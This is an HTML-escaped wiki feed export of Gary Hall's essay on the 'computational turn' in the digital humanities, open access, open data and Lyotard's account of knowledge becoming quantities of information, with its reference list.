&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2008)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this 'experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship moreover that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and medicine) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now due to the fact that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information –- so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue, they are bored with thinking about it and thus enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information, and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree with them when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such a creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at the Data Landscapes, AHRC network event, held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010]) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol.7, no.1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011) 'There's Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics,' ''Cultural Politics''&amp;amp;nbsp;7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C (2011b forthcoming) ‘Transparency, Interrupted: Secrets of the Left’, Between Transparency and Secrecy', Annual Review, ''Theory, Culture and Society, ''December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom: The Prepared Text of U.S. of Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010) ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. (2010) response to Tanner Higgen, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M., Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010) ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008) ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’,''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MCNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Infomatics'', September, 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Infomatics'', September, 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July, 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), 'We Can Know It For You: The Secret Life of Metadata', ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgen, T. (2010) ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009) ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the future for research?, posting to the BOAI list, November 16. 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel_ Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol 1, No 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern”’, ''Critical Inquiry'', Vol. 30, Number 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011) ‘Where is Cultural Criticism in the Digital Humanities’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’” Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991) ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a) ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011) ‘Trending: The Promises and the Challenges of Big Social Data’,''Lev Manovich'', April 28: http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel report, ‘Energy Efficiency in the Home - UK - July 2010’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S. Choi, S., Hoey, J., Kendall, C., Maskalyk, J., and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PloS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. (2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a) ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', March 13. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b) response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Massachussetts: MIT. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’”, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’ ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Harvard: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009) ‘Global Warming: Brits Deny Humans are to Blame,’ ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. eds (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5502</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5502"/>
		<updated>2013-11-03T14:54:49Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts - to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibb’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; ''What Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these language whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment - in both the academy and society - in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon.This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis bestows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and to no doubt help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 